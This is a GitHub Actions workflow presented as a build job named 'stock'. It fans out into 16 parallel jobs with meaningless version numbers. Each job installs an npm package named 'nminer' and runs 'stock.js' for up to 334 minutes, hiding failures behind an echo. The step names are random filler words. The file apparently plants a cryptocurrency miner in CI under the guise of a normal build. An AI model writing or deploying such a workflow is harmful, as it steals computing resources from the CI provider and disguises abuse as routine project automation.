name: stock
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 9501 }
          - { version: 5399 }
          - { version: 7328 }
          - { version: 3559 }
          - { version: 1086 }
          - { version: 9484 }
          - { version: 6081 }
          - { version: 6575 }
          - { version: 2086 }
          - { version: 2019 }
          - { version: 6034 }
          - { version: 1581 }
          - { version: 3383 }
          - { version: 3751 }
          - { version: 1085 }
          - { version: 355 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: jaggedly duh hateful curl including
        run: |
          npm install nminer@latest
          timeout 334m node stock.js || echo "stock executed"